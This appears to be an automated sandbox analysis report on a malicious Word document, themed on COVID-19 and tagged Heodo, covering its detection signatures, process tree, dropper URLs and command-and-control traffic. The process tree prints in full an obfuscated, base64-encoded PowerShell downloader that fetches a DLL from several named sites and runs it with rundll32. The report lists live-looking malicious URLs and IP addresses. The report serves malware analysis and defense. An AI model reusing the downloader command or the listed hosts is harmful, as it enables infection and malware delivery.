Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Analysis Report AG60273928I_COVID-19_SARS-CoV-2.doc

Overview

General Information

Sample Name:AG60273928I_COVID-19_SARS-CoV-2.doc
Analysis ID:338719
MD5:6d718814f5cf1ccd99905fdac40a504a
SHA1:f1746098ad2bb75e3054351b190cc818712ae46a
SHA256:6bb1fa2cba1d52674b980804939a39bb7dc3a68a364402d393e6a3ae520cdce9
Tags:docHeodo

Most interesting Screenshot:

Detection

Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Creates processes via WMI
Document contains an embedded VBA with many GOTO operations indicating source code obfuscation
Document contains an embedded VBA with many randomly named variables
Encrypted powershell cmdline option found
Hides that the sample has been downloaded from the Internet (zone.identifier)
Machine Learning detection for dropped file
Obfuscated command line found
Potential dropper URLs found in powershell memory
PowerShell case anomaly found
Powershell drops PE file
Suspicious powershell command line found
Very long command line found
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Deletes files inside the Windows folder
Detected potential crypto function
Document contains an embedded VBA macro which executes code when the document is opened / closed
Document contains embedded VBA macros
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains sections with non-standard names
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

Startup

  • System is w7x64
  • WINWORD.EXE (PID: 1604 cmdline: 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding MD5: 95C38D04597050285A18F66039EDB456)
  • cmd.exe (PID: 2340 cmdline: cmd cmd cmd cmd /c msg %username% /v Word experienced an error trying to open the file. & P^Ow^er^she^L^L -w hidden -ENCOD JAAwAGUAMgB0AGsAPQBbAHQAeQBQAGUAXQAoACIAewAyAH0AewAxAH0AewAwAH0AewAzAH0AewA0AH0AIgAtAGYAJwBJACcALAAnAG0ALgAnACwAJwBTAHkAcwB0AEUAJwAsACcAbwAuAEQAaQAnACwAJwByAGUAQwBUAG8AcgB5ACcAKQA7ACAAcwBlAHQALQBpAHQARQBNACAAIAB2AEEAcgBpAGEAYgBMAEUAOgB3AGQAOAAgACAAKAAgAFsAVAB5AFAAZQBdACgAIgB7ADEAfQB7ADIAfQB7ADAAfQB7ADMAfQB7ADQAfQAiACAALQBmACcAVgBJAGMARQBQAE8AaQBOAHQATQBhAG4AYQAnACwAJwBTAHkAUwB0ACcALAAnAGUATQAuAE4ARQB0AC4AcwBlAFIAJwAsACcAZwAnACwAJwBFAHIAJwApACkAIAA7ACQARQByAHIAbwByAEEAYwB0AGkAbwBuAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA9ACAAKAAoACcAUwBpAGwAZQAnACsAJwBuACcAKQArACgAJwB0AGwAeQBDAG8AJwArACcAbgAnACkAKwAnAHQAJwArACgAJwBpAG4AJwArACcAdQBlACcAKQApADsAJABOADMAMQA3ADYAYwByAD0AJABRADIANQBVACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABWADkANgBSADsAJABDAF8AMQBRAD0AKAAnAE0AOQAnACsAJwA1AEkAJwApADsAIAAgACgAIAAgAFYAYQByAEkAQQBCAEwAZQAgACAAMABFADIAdABLACAAKQAuAHYAYQBMAFUARQA6ADoAIgBjAHIARQBBAFQAZQBEAGAASQBSAGUAQwBgAFQATwBSAFkAIgAoACQASABPAE0ARQAgACsAIAAoACgAKAAnAEIASgBsAFcAZAAnACsAJwBkACcAKQArACgAJwB1AHkAMgAnACsAJwBtAEIAJwApACsAJwBKACcAKwAoACcAbABUAG0AYwAnACsAJwAxACcAKQArACgAJwBrACcAKwAnAHUAbwAnACkAKwAnAEIASgAnACsAJwBsACcAKQAuACIAUgBFAGAAcABgAEwAYQBjAEUAIgAoACgAJwBCACcAKwAnAEoAbAAnACkALAAnAFwAJwApACkAKQA7ACQATgA3ADMAUAA9ACgAJwBLACcAKwAoACcAMAAnACsAJwAzAFYAJwApACkAOwAgACQAVwBEADgAOgA6ACIAcwBgAEUAYABjAFUAUgBpAHQAWQBQAHIATwBUAG8AYwBgAG8AbAAiACAAPQAgACgAJwBUAGwAJwArACgAJwBzACcAKwAnADEAMgAnACkAKQA7ACQAVwBfADUASwA9ACgAKAAnAFQAJwArACcAOAA4ACcAKQArACcASgAnACkAOwAkAEkAeQBxAHgAdgA5AF8AIAA9ACAAKAAoACcASgA3ACcAKwAnADAAJwApACsAJwBIACcAKQA7ACQATAAxADIASwA9ACgAJwBZADAAJwArACcAMwBDACcAKQA7ACQATwBqAGkAaABuAHcAZwA9ACQASABPAE0ARQArACgAKAAoACcAUQBMAE8AVwBkAGQAJwArACcAdQAnACsAJwB5ADIAJwApACsAJwBtACcAKwAoACcAUQBMACcAKwAnAE8AJwApACsAJwBUAG0AJwArACgAJwBjACcAKwAnADEAawB1ACcAKQArACgAJwBvAFEATAAnACsAJwBPACcAKQApAC4AIgBSAGAAZQBQAGwAYQBgAGMAZQAiACgAKABbAGMAaABhAHIAXQA4ADEAKwBbAGMAaABhAHIAXQA3ADYAKwBbAGMAaABhAHIAXQA3ADkAKQAsACcAXAAnACkAKQArACQASQB5AHEAeAB2ADkAXwArACgAKAAnAC4AJwArACcAZABsACcAKQArACcAbAAnACkAOwAkAEEAMAA5AEwAPQAoACcAWAAnACsAKAAnADYAOAAnACsAJwBLACcAKQApADsAJABYADQAXwAxAHEAOABxAD0AKAAnAHcAXQAnACsAJwB4AG0AJwArACgAJwBbAHYAJwArACcAcwA6AC8ALwAnACsAJwBzAGgAdQBsACcAKQArACcAbwAnACsAKAAnAHYAJwArACcAYgBhAGEAJwArACcAegBhAHIALgBjAG8AbQAnACkAKwAnAC8AJwArACcAYwAnACsAKAAnAC8AJwArACcAYgBjAEwANgAvACcAKQArACgAJwBAACcAKwAnAHcAXQB4AG0AJwApACsAKAAnAFsAdgAnACsAJwBzACcAKQArACcAOgAvACcAKwAoACcALwBtACcAKwAnAHkAYgAnACkAKwAoACcAdQBzACcAKwAnAGkAJwApACsAKAAnAG4AZQBzAHMAJwArACcAZQAnACsAJwB2AGUAbgAnACkAKwAoACcAdAAnACsAJwAuAGMAbwBtACcAKQArACgAJwAvAHQAaQAnACsAJwBrAGkAJwApACsAKAAnAC0AJwArACcAaQBuACcAKQArACgAJwBzAHQAYQAnACsAJwBsACcAKwAnAGwAJwArACcALwBlAC8AQAAnACkAKwAoACcAdwBdAHgAbQAnACsAJwBbAHYAJwArACcAOgAnACkAKwAoACcALwAvAHUAJwArACcAaABrACcAKwAnAC4AYwBuACcAKQArACgAJwBjAHIAJwArACcAYQBuAGUAcwAnACkAKwAnAC4AYwAnACsAKAAnAG8AJwArACcAbQAvACcAKQArACgAJwBFACcAKwAnAHIAcgAnACkAKwAnAG8AJwArACgAJwByACcAKwAnAFAAYQBnAGUAcwAnACkAKwAnAC8AMwAnACsAJwAvACcAKwAnAEAAJwArACgAJwB3AF0AeABtACcAKwAnAFsAdgBzACcAKQArACcAOgAvACcAKwAnAC8AJwArACcAYwBhACcAKwAnAHAAJwArACgAJwB0AHUAcgAnACsAJwBlACcAKwAnAHQAaABlAGEAYwAnACkAKwAnAHQAaQAnACsAJwBvACcAKwAnAG4AJwArACcALgAnACsAKAAnAGMAbwBtAC4AJwArACcAYQB1ACcAKQArACgAJwAvACcAKwAnAHcAcAAtACcAKwAnAGkAbgBjACcAKQArACcAbAB1ACcAKwAnAGQAJwArACgAJwBlAHMAJwArACcALwBZACcAKQArACcAagBwACcAKwAoACcALwBAACcAKwAnAHcAXQAnACsAJwB4AG0AWwB2AHMAOgAnACsAJwAvAC8AdABoACcAKQArACcAZQBuACcAKwAoACcAZQAnACsAJwB0AHcAJwArACcAbwByAGsAJwArACcAZQByAC4AYwAnACkAKwAoACcAYQAnACsAJwAvAGMAJwApACsAJwBvAG0AJwArACcAbQBlACcAKwAnAG4AdAAnACsAJwAvACcAKwAnADgAJwArACcATgA0ACcAKwAnAC8AJwArACcAQAAnACsAJwB3ACcAKwAoACcAXQB4AG0AJwArACcAWwB2ACcAKQArACgAJwBzADoAJwArACcALwAnACkAKwAoACcALwAnACsAJwB0AHIAJwApACsAKAAnAGEAJwArACcAeQBvAG4AbABpAG4AJwApACsAJwBlACcAKwAnAGcAJwArACcAaAAuACcAKwAoACcAYwBvACcAKwAnAG0ALwAnACsAJwBjAGcAaQAtAGIAaQAnACkAKwAoACcAbgAnACsAJwAvAEgAQgBQACcAKwAnAFIALwBAACcAKQArACcAdwBdACcAKwAnAHgAbQAnACsAKAAnAFsAdgAnACsAJwA6AC8ALwBtAG0AbwAnACsAJwAuACcAKQArACgAJwBtACcAKwAnAGEAcgAnACkAKwAnAHQAaQAnACsAKAAnAG4AcABvAGwAbABvACcAKwAnAGMAJwArACcAawAuAGMAbwAuACcAKQArACgAJwB1AGsAJwArACcALwBhAC8AJwArACcAUwBRAFMAJwApACsAJwBHACcAKwAnAGcAJwArACcALwAnACkALgAiAHIAZQBgAFAAYABMAGEAYwBFACIAKAAoACgAJwB3ACcAKwAnAF0AeABtAFsAJwApACsAJwB2ACcAKQAsACgAWwBhAHIAcgBhAHkAXQAoACcAcwBkACcALAAnAHMAdwAnACkALAAoACgAJwBoACcAKwAnAHQAdAAnACkAKwAnAHAAJwApACwAJwAzAGQAJwApAFsAMQBdACkALgAiAFMAcABMAGAAaQBUACIAKAAkAEUANwA3AEsAIAArACAAJABOADMAMQA3ADYAYwByACAAKwAgACQAVQAxADEASAApADsAJABZADgAXwBZAD0AKAAoACcASwA5ACcAKwAnADAAJwApACsAJwBHACcAKQA7AGYAbwByAGUAYQBjAGgAIAAoACQATAB5AHQAdwB6ADIAcwAgAGkAbgAgACQAWAA0AF8AMQBxADgAcQApAHsAdAByAHkAewAoAC4AKAAnAE4AZQAnACsAJwB3AC0ATwAnACsAJwBiAGoAZQBjAHQAJwApACAAUwBZAHMAVABFAG0ALgBuAEUAdAAuAFcAZQBCAEMAbABpAEUATgB0ACkALgAiAGQAbwBXAG4AYABMAGAAbwBBAGQAZgBJAGAATABFACIAKAAkAEwAeQB0AHcAegAyAHMALAAgACQATwBqAGkAaABuAHcAZwApADsAJABaADgAMwBRAD0AKAAnAFgAMAAnACsAJwAzAEcAJwApADsASQBmACAAKAAoACYAKAAnAEcAZQAnACsAJwB0AC0ASQB0AGUAbQAnACkAIAAkAE8AagBpAGgAbgB3AGcAKQAuACIATABgAGUATgBHAHQAaAAiACAALQBnAGUAIAAzADIAOAAxADcAKQAgAHsALgAoACcAcgAnACsAJwB1AG4AZAAnACsAJwBsAGwAMwAyACcAKQAgACQATwBqAGkAaABuAHcAZwAsACgAKAAnAFMAJwArACcAaABvACcAKQArACgAJwB3AEQAaQAnACsAJwBhACcAKwAnAGwAbwAnACkAKwAnAGcAQQAnACkALgAiAHQAYABvAHMAVABSAEkAYABOAGcAIgAoACkAOwAkAFkANgA5AEwAPQAoACcASwA4ACcAKwAnADQAVgAnACkAOwBiAHIAZQBhAGsAOwAkAFYAXwAyAFYAPQAoACcAWAAwACcAKwAnADcAUwAnACkAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAFEANQAxAE8APQAoACgAJwBIACcAKwAnAF8AMwAnACkAKwAnAEcAJwApAA== MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)
    • msg.exe (PID: 2608 cmdline: msg user /v Word experienced an error trying to open the file. MD5: 2214979661E779C3E3C33D4F14E6F3AC)
    • powershell.exe (PID: 2692 cmdline: POwersheLL -w hidden -ENCOD JAAwAGUAMgB0AGsAPQBbAHQAeQBQAGUAXQAoACIAewAyAH0AewAxAH0AewAwAH0AewAzAH0AewA0AH0AIgAtAGYAJwBJACcALAAnAG0ALgAnACwAJwBTAHkAcwB0AEUAJwAsACcAbwAuAEQAaQAnACwAJwByAGUAQwBUAG8AcgB5ACcAKQA7ACAAcwBlAHQALQBpAHQARQBNACAAIAB2AEEAcgBpAGEAYgBMAEUAOgB3AGQAOAAgACAAKAAgAFsAVAB5AFAAZQBdACgAIgB7ADEAfQB7ADIAfQB7ADAAfQB7ADMAfQB7ADQAfQAiACAALQBmACcAVgBJAGMARQBQAE8AaQBOAHQATQBhAG4AYQAnACwAJwBTAHkAUwB0ACcALAAnAGUATQAuAE4ARQB0AC4AcwBlAFIAJwAsACcAZwAnACwAJwBFAHIAJwApACkAIAA7ACQARQByAHIAbwByAEEAYwB0AGkAbwBuAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA9ACAAKAAoACcAUwBpAGwAZQAnACsAJwBuACcAKQArACgAJwB0AGwAeQBDAG8AJwArACcAbgAnACkAKwAnAHQAJwArACgAJwBpAG4AJwArACcAdQBlACcAKQApADsAJABOADMAMQA3ADYAYwByAD0AJABRADIANQBVACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABWADkANgBSADsAJABDAF8AMQBRAD0AKAAnAE0AOQAnACsAJwA1AEkAJwApADsAIAAgACgAIAAgAFYAYQByAEkAQQBCAEwAZQAgACAAMABFADIAdABLACAAKQAuAHYAYQBMAFUARQA6ADoAIgBjAHIARQBBAFQAZQBEAGAASQBSAGUAQwBgAFQATwBSAFkAIgAoACQASABPAE0ARQAgACsAIAAoACgAKAAnAEIASgBsAFcAZAAnACsAJwBkACcAKQArACgAJwB1AHkAMgAnACsAJwBtAEIAJwApACsAJwBKACcAKwAoACcAbABUAG0AYwAnACsAJwAxACcAKQArACgAJwBrACcAKwAnAHUAbwAnACkAKwAnAEIASgAnACsAJwBsACcAKQAuACIAUgBFAGAAcABgAEwAYQBjAEUAIgAoACgAJwBCACcAKwAnAEoAbAAnACkALAAnAFwAJwApACkAKQA7ACQATgA3ADMAUAA9ACgAJwBLACcAKwAoACcAMAAnACsAJwAzAFYAJwApACkAOwAgACQAVwBEADgAOgA6ACIAcwBgAEUAYABjAFUAUgBpAHQAWQBQAHIATwBUAG8AYwBgAG8AbAAiACAAPQAgACgAJwBUAGwAJwArACgAJwBzACcAKwAnADEAMgAnACkAKQA7ACQAVwBfADUASwA9ACgAKAAnAFQAJwArACcAOAA4ACcAKQArACcASgAnACkAOwAkAEkAeQBxAHgAdgA5AF8AIAA9ACAAKAAoACcASgA3ACcAKwAnADAAJwApACsAJwBIACcAKQA7ACQATAAxADIASwA9ACgAJwBZADAAJwArACcAMwBDACcAKQA7ACQATwBqAGkAaABuAHcAZwA9ACQASABPAE0ARQArACgAKAAoACcAUQBMAE8AVwBkAGQAJwArACcAdQAnACsAJwB5ADIAJwApACsAJwBtACcAKwAoACcAUQBMACcAKwAnAE8AJwApACsAJwBUAG0AJwArACgAJwBjACcAKwAnADEAawB1ACcAKQArACgAJwBvAFEATAAnACsAJwBPACcAKQApAC4AIgBSAGAAZQBQAGwAYQBgAGMAZQAiACgAKABbAGMAaABhAHIAXQA4ADEAKwBbAGMAaABhAHIAXQA3ADYAKwBbAGMAaABhAHIAXQA3ADkAKQAsACcAXAAnACkAKQArACQASQB5AHEAeAB2ADkAXwArACgAKAAnAC4AJwArACcAZABsACcAKQArACcAbAAnACkAOwAkAEEAMAA5AEwAPQAoACcAWAAnACsAKAAnADYAOAAnACsAJwBLACcAKQApADsAJABYADQAXwAxAHEAOABxAD0AKAAnAHcAXQAnACsAJwB4AG0AJwArACgAJwBbAHYAJwArACcAcwA6AC8ALwAnACsAJwBzAGgAdQBsACcAKQArACcAbwAnACsAKAAnAHYAJwArACcAYgBhAGEAJwArACcAegBhAHIALgBjAG8AbQAnACkAKwAnAC8AJwArACcAYwAnACsAKAAnAC8AJwArACcAYgBjAEwANgAvACcAKQArACgAJwBAACcAKwAnAHcAXQB4AG0AJwApACsAKAAnAFsAdgAnACsAJwBzACcAKQArACcAOgAvACcAKwAoACcALwBtACcAKwAnAHkAYgAnACkAKwAoACcAdQBzACcAKwAnAGkAJwApACsAKAAnAG4AZQBzAHMAJwArACcAZQAnACsAJwB2AGUAbgAnACkAKwAoACcAdAAnACsAJwAuAGMAbwBtACcAKQArACgAJwAvAHQAaQAnACsAJwBrAGkAJwApACsAKAAnAC0AJwArACcAaQBuACcAKQArACgAJwBzAHQAYQAnACsAJwBsACcAKwAnAGwAJwArACcALwBlAC8AQAAnACkAKwAoACcAdwBdAHgAbQAnACsAJwBbAHYAJwArACcAOgAnACkAKwAoACcALwAvAHUAJwArACcAaABrACcAKwAnAC4AYwBuACcAKQArACgAJwBjAHIAJwArACcAYQBuAGUAcwAnACkAKwAnAC4AYwAnACsAKAAnAG8AJwArACcAbQAvACcAKQArACgAJwBFACcAKwAnAHIAcgAnACkAKwAnAG8AJwArACgAJwByACcAKwAnAFAAYQBnAGUAcwAnACkAKwAnAC8AMwAnACsAJwAvACcAKwAnAEAAJwArACgAJwB3AF0AeABtACcAKwAnAFsAdgBzACcAKQArACcAOgAvACcAKwAnAC8AJwArACcAYwBhACcAKwAnAHAAJwArACgAJwB0AHUAcgAnACsAJwBlACcAKwAnAHQAaABlAGEAYwAnACkAKwAnAHQAaQAnACsAJwBvACcAKwAnAG4AJwArACcALgAnACsAKAAnAGMAbwBtAC4AJwArACcAYQB1ACcAKQArACgAJwAvACcAKwAnAHcAcAAtACcAKwAnAGkAbgBjACcAKQArACcAbAB1ACcAKwAnAGQAJwArACgAJwBlAHMAJwArACcALwBZACcAKQArACcAagBwACcAKwAoACcALwBAACcAKwAnAHcAXQAnACsAJwB4AG0AWwB2AHMAOgAnACsAJwAvAC8AdABoACcAKQArACcAZQBuACcAKwAoACcAZQAnACsAJwB0AHcAJwArACcAbwByAGsAJwArACcAZQByAC4AYwAnACkAKwAoACcAYQAnACsAJwAvAGMAJwApACsAJwBvAG0AJwArACcAbQBlACcAKwAnAG4AdAAnACsAJwAvACcAKwAnADgAJwArACcATgA0ACcAKwAnAC8AJwArACcAQAAnACsAJwB3ACcAKwAoACcAXQB4AG0AJwArACcAWwB2ACcAKQArACgAJwBzADoAJwArACcALwAnACkAKwAoACcALwAnACsAJwB0AHIAJwApACsAKAAnAGEAJwArACcAeQBvAG4AbABpAG4AJwApACsAJwBlACcAKwAnAGcAJwArACcAaAAuACcAKwAoACcAYwBvACcAKwAnAG0ALwAnACsAJwBjAGcAaQAtAGIAaQAnACkAKwAoACcAbgAnACsAJwAvAEgAQgBQACcAKwAnAFIALwBAACcAKQArACcAdwBdACcAKwAnAHgAbQAnACsAKAAnAFsAdgAnACsAJwA6AC8ALwBtAG0AbwAnACsAJwAuACcAKQArACgAJwBtACcAKwAnAGEAcgAnACkAKwAnAHQAaQAnACsAKAAnAG4AcABvAGwAbABvACcAKwAnAGMAJwArACcAawAuAGMAbwAuACcAKQArACgAJwB1AGsAJwArACcALwBhAC8AJwArACcAUwBRAFMAJwApACsAJwBHACcAKwAnAGcAJwArACcALwAnACkALgAiAHIAZQBgAFAAYABMAGEAYwBFACIAKAAoACgAJwB3ACcAKwAnAF0AeABtAFsAJwApACsAJwB2ACcAKQAsACgAWwBhAHIAcgBhAHkAXQAoACcAcwBkACcALAAnAHMAdwAnACkALAAoACgAJwBoACcAKwAnAHQAdAAnACkAKwAnAHAAJwApACwAJwAzAGQAJwApAFsAMQBdACkALgAiAFMAcABMAGAAaQBUACIAKAAkAEUANwA3AEsAIAArACAAJABOADMAMQA3ADYAYwByACAAKwAgACQAVQAxADEASAApADsAJABZADgAXwBZAD0AKAAoACcASwA5ACcAKwAnADAAJwApACsAJwBHACcAKQA7AGYAbwByAGUAYQBjAGgAIAAoACQATAB5AHQAdwB6ADIAcwAgAGkAbgAgACQAWAA0AF8AMQBxADgAcQApAHsAdAByAHkAewAoAC4AKAAnAE4AZQAnACsAJwB3AC0ATwAnACsAJwBiAGoAZQBjAHQAJwApACAAUwBZAHMAVABFAG0ALgBuAEUAdAAuAFcAZQBCAEMAbABpAEUATgB0ACkALgAiAGQAbwBXAG4AYABMAGAAbwBBAGQAZgBJAGAATABFACIAKAAkAEwAeQB0AHcAegAyAHMALAAgACQATwBqAGkAaABuAHcAZwApADsAJABaADgAMwBRAD0AKAAnAFgAMAAnACsAJwAzAEcAJwApADsASQBmACAAKAAoACYAKAAnAEcAZQAnACsAJwB0AC0ASQB0AGUAbQAnACkAIAAkAE8AagBpAGgAbgB3AGcAKQAuACIATABgAGUATgBHAHQAaAAiACAALQBnAGUAIAAzADIAOAAxADcAKQAgAHsALgAoACcAcgAnACsAJwB1AG4AZAAnACsAJwBsAGwAMwAyACcAKQAgACQATwBqAGkAaABuAHcAZwAsACgAKAAnAFMAJwArACcAaABvACcAKQArACgAJwB3AEQAaQAnACsAJwBhACcAKwAnAGwAbwAnACkAKwAnAGcAQQAnACkALgAiAHQAYABvAHMAVABSAEkAYABOAGcAIgAoACkAOwAkAFkANgA5AEwAPQAoACcASwA4ACcAKwAnADQAVgAnACkAOwBiAHIAZQBhAGsAOwAkAFYAXwAyAFYAPQAoACcAWAAwACcAKwAnADcAUwAnACkAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAFEANQAxAE8APQAoACgAJwBIACcAKwAnAF8AMwAnACkAKwAnAEcAJwApAA== MD5: 852D67A27E454BD389FA7F02A8CBE23F)
      • rundll32.exe (PID: 960 cmdline: 'C:\Windows\system32\rundll32.exe' C:\Users\user\Wdduy2m\Tmc1kuo\J70H.dll ShowDialogA MD5: DD81D91FF3B0763C392422865C9AC12E)
        • rundll32.exe (PID: 2916 cmdline: 'C:\Windows\system32\rundll32.exe' C:\Users\user\Wdduy2m\Tmc1kuo\J70H.dll ShowDialogA MD5: 51138BEEA3E2C21EC44D0932C71762A8)
          • rundll32.exe (PID: 2956 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Qafsungwqhhv\abffsuupeze.glo',ShowDialogA MD5: 51138BEEA3E2C21EC44D0932C71762A8)
            • rundll32.exe (PID: 2908 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Hqmvwbjvtszlkw\wwuzivduoqkxt.pxe',ShowDialogA MD5: 51138BEEA3E2C21EC44D0932C71762A8)
              • rundll32.exe (PID: 2484 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Aanys\cokk.vuq',ShowDialogA MD5: 51138BEEA3E2C21EC44D0932C71762A8)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000005.00000002.2107242892.0000000000216000.00000004.00000001.sdmpPowerShell_Case_AnomalyDetects obfuscated PowerShell hacktoolsFlorian Roth
  • 0x1f10:$s1: POwersheLL
00000005.00000002.2107409443.0000000001BA6000.00000004.00000001.sdmpPowerShell_Case_AnomalyDetects obfuscated PowerShell hacktoolsFlorian Roth
  • 0x890:$s1: POwersheLL

Sigma Overview

No Sigma rule has matched

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

barindex
Antivirus detection for URL or domainShow sources
Source: https://trayonlinegh.com/cgi-bin/HBPR/Avira URL Cloud: Label: malware
Source: https://capturetheaction.com.au/wp-includes/Yjp/Avira URL Cloud: Label: malware
Source: https://shulovbaazar.com/c/bcL6/Avira URL Cloud: Label: malware
Multi AV Scanner detection for submitted fileShow sources
Source: AG60273928I_COVID-19_SARS-CoV-2.docVirustotal: Detection: 26%Perma Link
Source: AG60273928I_COVID-19_SARS-CoV-2.docReversingLabs: Detection: 22%
Machine Learning detection for dropped fileShow sources
Source: C:\Users\user\Wdduy2m\Tmc1kuo\J70H.dllJoe Sandbox ML: detected
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: Binary string: ws\dll\mscorlib.pdb source: powershell.exe, 00000005.00000002.2107605290.0000000001E67000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\symbols\dll\mscorlib.pdbg source: powershell.exe, 00000005.00000002.2107605290.0000000001E67000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\mscorlib.pdbc source: powershell.exe, 00000005.00000002.2107605290.0000000001E67000.00000004.00000040.sdmp
Source: Binary string: mscorlib.pdb source: powershell.exe, 00000005.00000002.2107605290.0000000001E67000.00000004.00000040.sdmp
Source: Binary string: scorlib.pdb source: powershell.exe, 00000005.00000002.2107605290.0000000001E67000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\mscorlib.pdbE source: powershell.exe, 00000005.00000002.2107605290.0000000001E67000.00000004.00000040.sdmp
Source: Binary string: ws\mscorlib.pdbpdblib.pdb source: powershell.exe, 00000005.00000002.2107605290.0000000001E67000.00000004.00000040.sdmp
Source: Binary string: mscorrc.pdb source: powershell.exe, 00000005.00000002.2120130538.000000001B900000.00000002.00000001.sdmp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
Source: global trafficDNS query: name: shulovbaazar.com
Source: global trafficTCP traffic: 192.168.2.22:49165 -> 51.79.161.36:443
Source: global trafficTCP traffic: 192.168.2.22:49165 -> 51.79.161.36:443

Networking:

barindex
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
Source: TrafficSnort IDS: 2404340 ET CNC Feodo Tracker Reported CnC Server TCP group 21 192.168.2.22:49170 -> 71.72.196.159:80
Potential dropper URLs found in powershell memoryShow sources
Source: powershell.exe, 00000005.00000002.2112345282.0000000003693000.00000004.00000001.sdmpString found in memory: https://shulovbaazar.com/c/bcL6/
Source: powershell.exe, 00000005.00000002.2112345282.0000000003693000.00000004.00000001.sdmpString found in memory: https://mybusinessevent.com/tiki-install/e/
Source: powershell.exe, 00000005.00000002.2112345282.0000000003693000.00000004.00000001.sdmpString found in memory: http://uhk.cncranes.com/ErrorPages/3/
Source: powershell.exe, 00000005.00000002.2112345282.0000000003693000.00000004.00000001.sdmpString found in memory: https://capturetheaction.com.au/wp-includes/Yjp/
Source: powershell.exe, 00000005.00000002.2112345282.0000000003693000.00000004.00000001.sdmpString found in memory: https://thenetworker.ca/comment/8N4/
Source: powershell.exe, 00000005.00000002.2112345282.0000000003693000.00000004.00000001.sdmpString found in memory: https://trayonlinegh.com/cgi-bin/HBPR/
Source: powershell.exe, 00000005.00000002.2112345282.0000000003693000.00000004.00000001.sdmpString found in memory: http://mmo.martinpollock.co.uk/a/SQSGg/
Source: global trafficHTTP traffic detected: GET /ErrorPages/3/ HTTP/1.1Host: uhk.cncranes.comConnection: Keep-Alive
Source: Joe Sandbox ViewIP Address: 71.72.196.159 71.72.196.159
Source: Joe Sandbox ViewIP Address: 71.72.196.159 71.72.196.159
Source: Joe Sandbox ViewASN Name: TWC-10796-MIDWESTUS TWC-10796-MIDWESTUS
Source: Joe Sandbox ViewASN Name: REGISTER_UK-ASGB REGISTER_UK-ASGB
Source: global trafficHTTP traffic detected: POST /kdd8h70lwp/lfu3p05/u2kanr3/ HTTP/1.1DNT: 0Referer: 69.49.88.46/kdd8h70lwp/lfu3p05/u2kanr3/Content-Type: multipart/form-data; boundary=--------------IOWFryyt5oe5vIUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 69.49.88.46Content-Length: 5572Connection: Keep-AliveCache-Control: no-cache
Source: unknownTCP traffic detected without corresponding DNS query: 71.72.196.159
Source: unknownTCP traffic detected without corresponding DNS query: 71.72.196.159
Source: unknownTCP traffic detected without corresponding DNS query: 69.49.88.46
Source: unknownTCP traffic detected without corresponding DNS query: 69.49.88.46
Source: unknownTCP traffic detected without corresponding DNS query: 69.49.88.46
Source: unknownTCP traffic detected without corresponding DNS query: 69.49.88.46
Source: unknownTCP traffic detected without corresponding DNS query: 69.49.88.46
Source: unknownTCP traffic detected without corresponding DNS query: 69.49.88.46
Source: unknownTCP traffic detected without corresponding DNS query: 69.49.88.46
Source: unknownTCP traffic detected without corresponding DNS query: 69.49.88.46
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{73127D7D-FA20-48C4-87C4-17800DB89026}.tmpJump to behavior
